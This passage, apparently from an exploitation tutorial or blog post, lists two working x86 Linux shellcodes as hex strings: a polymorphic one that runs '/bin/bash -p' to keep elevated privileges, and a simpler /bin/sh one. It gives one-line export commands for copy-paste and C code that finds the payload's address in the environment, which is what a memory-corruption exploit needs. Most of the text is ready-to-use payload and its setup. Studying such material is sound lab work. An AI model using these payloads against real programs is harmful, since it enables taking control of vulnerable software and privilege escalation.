As a reminder, I put here the two shellcodes I use. The first one comes from http://www.shell-storm.org/shellcode/ and is a polymorphic shellcode launching execve("/bin/bash", ["/bin/bash", "-p"], NULL):
"\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
"\x71\x8a\xe2\x53\x6b\x69\x69\x30"
"\x63\x62\x74\x69\x30\x63\x6a\x6f"
"\x8a\xe4\x53\x52\x54\x8a\xe2\xce"
"\x81"
On a single line, for a convenient copy-paste:
export SC="\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
The second shellcode is a simpler one, taken from Wikipedia, launching /bin/sh on an x86 machine:
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
and the same shellcode on a single line:
export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
Once the variable is exported, a small C program can print the address at which the shellcode sits in its environment:
#include <stdio.h>
#include <stdlib.h>   /* for getenv() */

int main(void) {
    /* getenv() returns a pointer into the process environment, i.e. the
     * address where the exported SC bytes sit; cast it to an integer wide
     * enough for a pointer before printing it. */
    printf("SHELLCODE found at %08lx\n", (unsigned long)getenv("SC"));
    return 0;
}
Just compile it, and you get the address:
mitsurugi@mitsu:~$ make sc
cc sc.c -o sc
mitsurugi@mitsu:~$ export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
mitsurugi@mitsu:~$ ./sc
SHELLCODE found at bff18dcf
mitsurugi@mitsu:~$
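As an added example (not code from the original post), here is a variant of that program that walks the environment block itself, prints the address the same way getenv() would, and flags a common quoting mistake: in bash, "\xeb" inside double quotes stays the four characters \, x, e, b instead of becoming one byte, so the check tells the two cases apart. The function names are my own.

```c
/* Added example: locate the SC variable in the environment block and
 * sanity-check its contents. Assumes a POSIX system exposing `environ`. */
#include <stdio.h>
#include <string.h>

extern char **environ;

/* Return a pointer to the value of NAME inside the environment block ENVP
 * (the same memory getenv() points at), or NULL if NAME is not set. */
const char *find_env_value(char *const *envp, const char *name)
{
    size_t n = strlen(name);
    for (; *envp != NULL; envp++) {
        if (strncmp(*envp, name, n) == 0 && (*envp)[n] == '=')
            return *envp + n + 1;
    }
    return NULL;
}

/* Bash keeps "\xeb" literal inside double quotes; detect a value that
 * holds the escape text rather than the decoded bytes. */
int holds_literal_escapes(const char *value)
{
    return value != NULL && value[0] == '\\' && value[1] == 'x';
}

/* Both shellcodes quoted above begin with a short jmp (0xEB). */
int starts_with_jmp(const char *value)
{
    return value != NULL && (unsigned char)value[0] == 0xEB;
}

int main(void)
{
    const char *sc = find_env_value(environ, "SC");
    if (sc == NULL) {
        fprintf(stderr, "SC is not set\n");
        return 1;
    }
    printf("SC value found at %p (%zu bytes)\n", (const void *)sc, strlen(sc));
    if (holds_literal_escapes(sc))
        printf("warning: SC holds the text \\x.., not raw bytes; "
               "bash only decodes \\x escapes inside $'...' quoting\n");
    else if (starts_with_jmp(sc))
        printf("first byte is 0xEB, the expected short jmp\n");
    return 0;
}
```

Because the value lives on the stack of the process that reads it, the printed address only describes this program's own environment layout.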